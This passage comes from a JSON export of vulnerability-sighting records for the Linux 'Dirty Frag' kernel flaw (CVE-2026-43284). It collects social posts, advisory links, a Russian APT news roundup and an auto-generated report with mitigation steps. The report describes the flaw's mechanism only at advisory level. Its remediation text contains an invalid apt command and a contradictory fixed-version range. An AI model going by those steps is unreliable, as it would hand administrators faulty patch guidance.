interactions\nCVE-2024-13362: 4 interactions\nCVE-2026-29201: 3 interactions\n", "creation_timestamp": "2026-05-11T02:30:39.215918Z"}, {"uuid": "e0fdd7e0-f602-427c-ab43-7d1f24c48792", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mlkco5szdg2z", "content": "This week's threat roundup covers infostealers and RATs like Remcos and Vidar, phishing exploiting cloud/OAuth, Linux/kernel exploits CVE-2026-43284, and network attacks targeting PAN-OS zero-day RCE. #OperationHumanitarian #LinuxSecurity", "creation_timestamp": "2026-05-11T03:15:24.112884Z"}, {"uuid": "ba563038-65c6-4087-8d4b-c9fbcb67e74a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-011-vulnerabilities-affecting-linux-cve-2026-43284-cve-2026-43500", "content": "", "creation_timestamp": "2026-05-08T10:39:10.000000Z"}, {"uuid": "2eed2dad-5514-46cd-bacb-facda25e8511", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ruari.velocipederider.com.ap.brid.gy/post/3mlkroxxmpot2", "content": "I upgraded my kernel for Copy Fail (CVE-2026-31431) not that long ago.\n\nNow I am upgrading again for Dirty Frag (CVE-2026-43284 and CVE-2026-43500).\n\nI hope things clam down a bit now but I guess we shall see\u2026", "creation_timestamp": "2026-05-11T07:47:08.191858Z"}, {"uuid": "67944d74-1fa9-4a72-98f9-fdc010cb75ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mlksshpyucrj", "content": "Dirty Frag (CVE-2026-43284/43500) \u2014 Copy Fail\u306e\u66ab\u5b9a\u7b56\u304c\u52b9\u304b\u306a\u3044\u7406\u7531\u3068\u672a\u30d1\u30c3\u30c1\u671f\u306e\u7ba1\u7406\u8005\u5bfe\u5fdc https://zenn.dev/linuxmaster/articles/dirty-frag-cve-2026-43284-43500", "creation_timestamp": "2026-05-11T08:04:09.811491Z"}, {"uuid": "4d143ce2-4bbc-45ae-bf3c-1590b79959df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlktlos7p3y2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Linux [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T08:18:58.387123Z"}, {"uuid": "e9724b3f-5e42-4837-903f-dd3508323160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/2GOBEcnqip1k_nIIvIE3w-bxwIdIiVvDIafo-Jg_nC3bf9M", "content": "", "creation_timestamp": "2026-05-09T21:00:04.000000Z"}, {"uuid": "611440df-cd5e-41fc-9b9e-f21acda1997d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3mlkuzkpxvu2q", "content": "Dirty Frag (CVE-2026-43284) Linux Privilege Escalation Affects Major\u00a0Distributions\n\nDirty Frag is an unpatched Linux kernel privilege escalation chain affecting ESP and RxRPC subsystems across major distributions, with PoC available.", "creation_timestamp": "2026-05-11T08:43:53.757298Z"}, {"uuid": "4a3587e9-8197-4afd-8e56-9da13340994f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/AI07jPDl7IHRtOitWV_PZ0T-XIh1na8tiD4BR5Qz19J-y9I", "content": "", "creation_timestamp": "2026-05-10T03:00:05.000000Z"}, {"uuid": "0a9d3b24-c6c2-4075-b34b-89cdaf6a61fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/eyAghHZewMQ85hQZ8LvzSeAPhb6BlDwFjZXgEDDJNJoZoDs", "content": "", "creation_timestamp": "2026-05-09T03:00:05.000000Z"}, {"uuid": "82ea78ac-9d7d-4f46-9947-de38d8a2a8ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116556150150224566", "content": "Dirty Frag Schwachstelle in Linux erm\u00f6glicht lokale Rechteausweitung\nhttps://borncity.com/blog/2026/05/09/dirty-frag-lokale-rechteausweitung-im-linux-kernel-cve-2026-43284-cve-2026-43500/", "creation_timestamp": "2026-05-11T13:21:50.699440Z"}, {"uuid": "57d90763-797b-470b-ba04-da3f061125e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83847", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DirtyFrag-Detector\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a liamromanis101\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 19:54:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43284/CVE-2026-43500 'DirtyFrag' Benign patch & mitigation detection script\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T20:00:04.000000Z"}, {"uuid": "e6f5e7b0-6dac-436e-9e63-90d9a68f1862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvz67xn5b2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:37.272766Z"}, {"uuid": "171efe7c-614f-4d3f-889a-a509e752df7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvza6vwp32", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:47.862425Z"}, {"uuid": "100e3eb3-c18c-47d3-a59d-eb826b854ce6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/e8LfDRtTf8nzcOa5URmJo_p6nGHeOtUQSV0vmQsSJYMEaqg", "content": "", "creation_timestamp": "2026-05-11T21:00:05.000000Z"}, {"uuid": "bf16124f-544e-47c7-a172-57637cd908d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/qnap-nas-elevation-of-privilege-vulnerability_20260512", "content": "", "creation_timestamp": "2026-05-11T20:00:00.000000Z"}, {"uuid": "da3874a6-5388-4309-942d-6f97ee8a0db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/kaossverige.bsky.social/post/3mln3jzkank2m", "content": "\ud83d\udcf9 Dirty Frag Exploit: CVE-2026-43284 & How to Patch Linux\u00a0#linux #FOSS #CachyOS #Nobara #PikaOS #EndeavourOS tmblr.co/Ze8JKnjKOCjP...", "creation_timestamp": "2026-05-12T05:45:56.143182Z"}, {"uuid": "443918a5-69a9-4c2c-901b-f61a90c23fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/mora.mastodon.uno.ap.brid.gy/post/3mln3wbdkpyt2", "content": "Dirty Frag: Linux Kernel Local Privilege Escalation via ESP and RxRPC\nUnpatched kernel flaw chain (CVE-2026-43284, CVE-2026-43500) enables root escalation on major Linux distributions.\n\nhttps://www.wiz.io/blog/dirty-frag-linux-kernel-local-privilege-escalation-via-esp-and-rxrpc", "creation_timestamp": "2026-05-12T05:52:44.182759Z"}, {"uuid": "81163c51-8766-4c1e-92fa-1eaceab8ca66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/alon710/755073f444e7d3aa947b92060157b8e4", "content": "# CVE-2026-43284: CVE-2026-43284: \"Dirty Frag\" Local Privilege Escalation via Linux Kernel Page Cache Corruption\n\n> **CVSS Score:** 8.8\n> **Published:** 2026-05-08\n> **Full Report:** https://cvereports.com/reports/CVE-2026-43284\n\n## Summary\nCVE-2026-43284, identified as \"Dirty Frag\", is a critical local privilege escalation vulnerability in the Linux kernel's handling of shared socket buffer fragments during Encapsulating Security Payload (ESP) decryption. The flaw permits unprivileged local adversaries to corrupt the Linux page cache, establishing a write-what-where primitive that can be leveraged to overwrite read-only system files such as /etc/passwd and achieve immediate root privilege escalation.\n\n## TL;DR\nA logic error in the Linux kernel allows unprivileged users to overwrite the memory cache of read-only files by exploiting the MSG_SPLICE_PAGES flag alongside ESP-in-UDP decryption. This enables direct manipulation of critical configuration files and arbitrary code execution as root.\n\n## Exploit Status: ACTIVE\n\n## Technical Details\n\n- **CWE ID**: CWE-123, CWE-787\n- **Attack Vector**: Local (AV:L)\n- **CVSS v3.1**: 8.8\n- **EPSS Score**: 0.00007\n- **Impact**: Local Privilege Escalation (Root)\n- **Exploit Status**: Active Exploitation\n- **Vulnerable Subsystem**: ESP / MSG_SPLICE_PAGES\n\n## Affected Systems\n\n- Linux Kernel\n- Ubuntu\n- Debian\n- Red Hat Enterprise Linux\n- **Linux Kernel**: >= 4.11, < 5.10.255 (Fixed in: `5.10.255`)\n- **Linux Kernel**: >= 5.12, < 5.15.205 (Fixed in: `5.15.205`)\n- **Linux Kernel**: >= 5.16, < 6.1.171 (Fixed in: `6.1.171`)\n- **Linux Kernel**: >= 6.2, < 6.6.138 (Fixed in: `6.6.138`)\n- **Linux Kernel**: >= 6.7, < 6.12.87 (Fixed in: `6.12.87`)\n- **Linux Kernel**: >= 6.13, < 6.18.28 (Fixed in: `6.18.28`)\n- **Linux Kernel**: >= 7.0, < 7.0.5 (Fixed in: `7.0.5`)\n\n## Mitigation\n\n- Upgrade the Linux kernel to the latest stable release containing the fix.\n- Disable or block UDP port 4500 if ESP-in-UDP is not required.\n- Implement eBPF-based behavioral monitoring (e.g., Falco) to detect the MSG_SPLICE_PAGES exploit pattern.\n\n**Remediation Steps:**\n1. Identify all hosts running vulnerable kernel versions (4.11 through 7.0.5).\n2. Schedule emergency maintenance windows for critical infrastructure.\n3. Apply distribution-specific kernel updates (e.g., apt update linux-image-generic).\n4. Reboot the affected systems to load the patched kernel.\n5. Verify the active kernel version using 'uname -r' post-reboot.\n\n## References\n\n- [NVD Vulnerability Detail - CVE-2026-43284](https://nvd.nist.gov/vuln/detail/CVE-2026-43284)\n- [Wiz Blog: Dirty Frag Linux Kernel Local Privilege Escalation](https://www.wiz.io/blog/dirty-frag-linux-kernel-local-privilege-escalation-via-esp-and-rxrpc)\n- [Microsoft Security Blog: Active Attack Dirty Frag](https://www.microsoft.com/en-us/security/blog/2026/05/08/active-attack-dirty-frag-linux-vulnerability-expands-post-compromise-risk/)\n- [Linux Kernel Source Patch](https://git.kernel.org/stable/c/a6cb440f274a22456ef3e86b457344f1678f38f9)\n- [OSS-Security Mailing List Announcement](http://www.openwall.com/lists/oss-security/2026/05/08/7)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-43284) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-05-12T06:50:29.000000Z"}, {"uuid": "9e3e22b0-b9ed-4051-a55f-029cff69d9e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mlnd2jbodkdu", "content": "Linux\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u300cDirty Frag\u300d \u653b\u6483\u3067\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u53ef\u80fd\u6027\uff08CVE-2026-43284\u3001CVE-2026-43500\uff09 | Codebook\uff5cSecurity News https://codebook.machinarecord.com/threatreport/silobreaker-cyber-alert/45540/", "creation_timestamp": "2026-05-12T08:00:19.116384Z"}, {"uuid": "aea9b25f-b3f0-439a-a25b-b2f05a2fb7c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/kasperskyb2b/2165", "content": "\ud83d\ude35\u200d\ud83d\udcab \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\ude08 \u041f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u0430 DAEMON Tools \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a. \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0438 \u0441 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0432\u0435\u043d\u0434\u043e\u0440\u0430, \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0412\u041f\u041e \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0444\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0436\u0435\u0440\u0442\u0432. \u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0441\u044f\u0442\u043a\u043e\u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 (\u0433\u043e\u0441\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440, \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0445 \u0438 \u0442\u043e\u0440\u0433\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0432 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u043e\u0440\u0443\u0441\u0441\u0438\u0438 \u0438 \u0422\u0430\u0438\u043b\u0430\u043d\u0434\u0435) \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0442\u043e\u0440\u043e\u0439 \u044d\u0442\u0430\u043f \u0430\u0442\u0430\u043a\u0438 \u2014 \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440, \u0430 \u0432 \u043e\u0434\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u2014 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0435 \u0412\u041f\u041e QUIC RAT.\n\n\u2744\ufe0f \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0442\u0435\u0445\u043d\u0438\u043a \u0438 \u0442\u0430\u043a\u0442\u0438\u043a \u0433\u0440\u0443\u043f\u043f\u044b UAT-8302, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0433\u043e\u0441\u043e\u0440\u0433\u0430\u043d\u044b \u0432 \u042e\u0436\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435 \u0438 \u0415\u0432\u0440\u043e\u043f\u0435. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0432\u0445\u043e\u0434\u044f\u0442 \u0431\u044d\u043a\u0434\u043e\u0440\u044b NetDraft \u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043d\u0430\u043c CloudSorcerer, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u043e\u0432\u043e\u0435 \u0412\u041f\u041e SNOWRUST.\n\n\ud83e\udeb7 \u0420\u0430\u0437\u0431\u043e\u0440 \u0430\u0442\u0430\u043a\u0438 APT OceanLotus, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b\u0438 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u0447\u043d\u044b\u0435 \u0430\u0440\u0445\u0438\u0432\u044b Python (wheels), \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0432 PyPI. \u0427\u0435\u0440\u0435\u0437 \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u043c\u043f\u043b\u0430\u043d\u0442 ZiChatBot, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0439 Zulip REST API \u043a\u0430\u043a \u043a\u0430\u043d\u0430\u043b \u04212. ZiChatBot \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u043e\u0434 Windows \u0438 Linux \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u0435\u043d \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0448\u0435\u043b\u043b\u043a\u043e\u0434. \u0412 \u0446\u0435\u043b\u043e\u043c \u044d\u0442\u0430 APT \u043f\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0441\u0432\u043e\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0410\u0437\u0438\u0438, \u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 PyPI \u0434\u0430\u0451\u0442 \u0435\u0439 \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u043e\u0445\u0432\u0430\u0442.\n\n\ud83d\udfe2\u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b Lazarus \u0441\u0434\u0435\u043b\u0430\u043b\u0438  \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0434\u043b\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Contagious Interview \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c\u0438. \u0425\u0443\u043a\u0438 \u0432 \u00ab\u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445\u00bb \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u043d\u0430 \u0440\u0443\u0442\u0438\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 git \u0432\u0440\u043e\u0434\u0435 clone \u0438\u043b\u0438 commit, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0443\u0447\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 npm install.\n\n\ud83d\udfe2 APT ScarCruft \u0432\u043d\u0435\u0434\u0440\u0438\u043b\u0430 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0432 Windows\u2011 \u0438 Android\u2011\u043a\u043b\u0438\u0435\u043d\u0442\u044b \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 \u0438\u0433\u0440\u043e\u0432\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b, \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0443 \u044d\u0442\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043a\u043e\u0440\u0435\u0439\u0446\u0435\u0432 \u0432 \u0440\u0430\u0439\u043e\u043d\u0435 \u042f\u043d\u044c\u0431\u044f\u043d\u044c. \u041c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0431\u043e\u0440\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0438 RokRAT \u0438 BirdCall \u0443\u0437\u043a\u043e\u043c\u0443 \u043a\u0440\u0443\u0433\u0443 \u0436\u0435\u0440\u0442\u0432.\n\n\ud83d\udfe2 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0431\u0435\u0441\u043f\u0438\u043b\u043e\u0442\u043d\u043e\u0439 \u0430\u0432\u0438\u0430\u0446\u0438\u0438, \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0432 \u0420\u0424 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. \u041f\u0440\u0438\u043c\u0430\u043d\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0430\u043c \u0412\u041f\u041e, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0435 \u043d\u0430 Rust.\n\n\ud83d\udd35 APT MuddyWater/Seedworm \u0432 \u0440\u044f\u0434\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b\u0430 \u0448\u0438\u0440\u043e\u043a\u043e\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a Chaos. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u043e \u2014 \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044e\u0449\u0438\u0439 \u043c\u0430\u043d\u0451\u0432\u0440 \u0434\u043b\u044f \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438.\n\n\ud83d\udd35 \u041e\u0431\u0437\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u044b\u0445 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u043c VoidStealer \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f application-bound encryption \u0438 \u043a\u0440\u0430\u0436\u0438 \u043a\u0443\u043a\u0438 \u0432 Chrome, Edge \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u0445 \u043d\u0430 \u0431\u0430\u0437\u0435 Chromium.\n\n\ud83d\udfe3 \u0410\u043d\u0430\u043b\u0438\u0437 PamDOORa \u2014 Linux\u2011\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 PAM\u2011\u043c\u043e\u0434\u0443\u043b\u044c, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0438\u0439 SSH\u2011\u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e \u00ab\u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c\u0443\u00bb \u043f\u0430\u0440\u043e\u043b\u044e \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c\u0443 TCP\u2011\u043f\u043e\u0440\u0442\u0443, \u043f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0431\u0438\u0440\u0430\u044f \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u0441\u0435\u0445 